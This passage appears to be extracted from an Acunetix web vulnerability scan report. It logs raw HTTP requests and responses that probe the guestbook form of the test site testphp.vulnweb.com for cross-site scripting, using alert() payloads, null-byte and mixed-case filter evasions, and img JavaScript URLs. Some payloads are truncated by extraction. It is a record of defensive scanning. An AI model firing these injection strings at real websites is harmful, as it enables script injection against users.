http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=%00"'>alert(469355921680)%3B&submit=add%20m essage Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Acunetix Website Audit

41

Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 94 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=

alert(469325921680)%3B&submit=add%20 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 129 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 118 Cookie: mycookie=3 Connection: Close Acunetix Website Audit

42

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=< Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 104 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28469205921619%29%3B%22%3E&subm it=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 82 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=<%00script>alert(469165921619)%3B&submit=add%20message Response Acunetix Website Audit

43

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 162 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 109 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text= &submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

44

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 102 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=

alert(469745922033)%3B&submit =add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 140 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Acunetix Website Audit

45

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 94 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit=add%20 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 73 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 104 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

46

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=alert(469535921909)%3B&sub Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 126 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 119 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28469575921909%2 9%3B%22%3E&submit=add%20message Response Acunetix Website Audit

47

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 96 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=alert(469495921909)%3B&submit=add%2 0message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 107 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=alert(469525921909)%3B&s ubmit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

48

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 117 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=< /ScRiPt>&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 102 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit =add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request Acunetix Website Audit

49

POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 170 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 81 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 99 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

50

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=>'>alert(469505921909)%3B&submit=a Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 112 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28469625921970%29%3B%22 %3E&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 137 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Acunetix Website Audit

51

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 148 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 102 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=%00"'>alert(469775922033)%3B&submit =add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

52

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 90 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=<%00script>alert(469585921970)%3B&submit=add%20messa ge Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 99 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=-->alert(469545921909)%3B&submit=ad d%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Acunetix Website Audit

53

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 116 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=email@somealert(469555921909)%3Bdo Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 84 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 86 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

54

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 99 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=>">alert(469515921909)%3B&submit=ad d%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 91 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=>">alert(469095921556)%3B&submit=add%20mess age Response HTTP/1.1 200 OK Server: nginx/1.4.1 Acunetix Website Audit

55

Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 107 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28468065920807%29%3B%22%3E&s ubmit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 78 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=<%00script>alert(468305920991)%3B&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Acunetix Website Audit

56

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 92 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=alert(468025920807)%3B&submit=add%20mes sage Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 104 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=email@somealert(468045920807)%3Bdomain.com&subm it=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 90 Acunetix Website Audit

57

Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20mess Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

